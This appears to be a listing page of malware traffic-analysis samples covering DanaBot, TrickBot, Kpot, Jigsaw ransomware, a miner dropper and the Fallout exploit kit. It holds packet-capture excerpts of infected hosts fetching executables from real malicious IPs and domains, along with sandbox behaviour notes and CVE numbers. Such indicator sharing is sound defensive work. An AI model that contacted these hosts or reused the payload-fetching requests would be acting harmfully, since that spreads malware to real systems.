DanaBot TrickBot Malware PCAP File Download Traffic Analysis 185.45.193.50 193.34.166.247

Hostile IPs: 176.123.7.51, 185.45.193.50, 193.34.166.247, 95.163.181.123
Tags: DanaBot, Gozi, Quakbot, Trickbot

2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1
GET /22JUM.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202587-
Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT
If-Range: "293800-5a6d31663c571"
Host: 176.123.7.51
Connection: Keep-Alive
2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0
2020-05-29 21:10:54.846062 IP […]

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What can the Kryptik virus do?
Executable code extraction
Attempts to connect to a dead IP:Port (1 unique times)
Creates RWX memory
A process attempted to delay the analysis task.
Expresses interest in specific running processes
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Performs some HTTP requests
The binary likely contains encrypted or compressed data.
Detects Sandboxie through the presence of a library
Checks for the presence of known windows from debuggers and forensic tools
Attempts to repeatedly call a single API many times in order to delay analysis time
Steals private information from local Internet […]

Jigsaw Ransomware Malware Crimeware PCAP File Download Traffic Sample

Avast: FileRepMetagen [Malware]
AVG: FileRepMetagen [Malware]
Avira (no cloud):
Malwarebytes: Ransom.Jigsaw
McAfee-GW-Edition: BehavesLike.Win32.Ransomware.dc
Microsoft: Trojan:Win32/Occamy.C

When executed, this ransomware has NO C2; it uses an e-mail address with directions, as pictured below:

2020-05-01 16:19:09.841147 IP 192.168.86.1.53 > 192.168.86.25.59527: 12228 1/0/0 A 41.97.11.131 (59)
service-updater.hopto.org
2020-05-01 16:19:09.841596 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [S], seq 1891890631, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021362 IP 41.97.11.131.80 > 192.168.86.25.50977: Flags [S.], seq 2051894246, ack 1891890632, win 8192, options [mss 1340,nop,wscale 8,nop,nop,sackOK], length 0
2020-05-01 16:19:10.021569 IP 192.168.86.25.50977 > 41.97.11.131.80: Flags [.], ack 1, win 16415, length 0
2020-05-01 16:19:10.022040 IP 192.168.86.25.50977 > 41.97.11.131.80: […]

Malware Dropper tldrbox.top Loads Crypto Currency Miner PCAP Download Traffic Sample

2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1
GET /2.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: tldrbox.top
Connection: Keep-Alive
2020-04-13 00:28:49.623505 IP 93.126.60.109.80 > 192.168.86.25.52831: Flags [.], ack 391, win 237, length 0
[…] > 192.168.86.25.52831: Flags [.], seq 1:1201, ack 391, win 237, length 1200: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 13 Apr 2020 04:29:15 GMT
Content-Type: application/octet-stream
Content-Length: 556032
Last-Modified: Wed, 08 Apr 2020 02:44:48 GMT
Connection: keep-alive
ETag: […]

Fallout Exploit Kit Raccoon Stealer CVE-2018-4878 CVE-2018-15982 CVE-2018-8174 Raccoon Stealer Malware PCAP Download Traffic Sample

Fallout Exploit Kit is back and targeting the following CVEs as of 4-8-2020:

Vulnerabilities: CVE-2018-4878, CVE-2018-15982, CVE-2018-8174

Fallout has been observed in the wild delivering the following malware payloads:

Ransomware
Stop – Ransomware
GandCrab 5 – Ransomware
Kraken Cryptor – Ransomware
GandCrab – Ransomware
Maze – Ransomware
Fake Globe – Ransomware
Minotaur – Ransomware
Matrix – Ransomware
Sodinokibi – Ransomware
Raccoon Stealer – This sample (also known as Legion, Mohazo, and Racealer) is a high-risk trojan-type application that stealthily infiltrates the system and collects personal information. Having this trojan installed on your computer might lead to various issues.

2020-02-24 19:34:02.651895 IP […]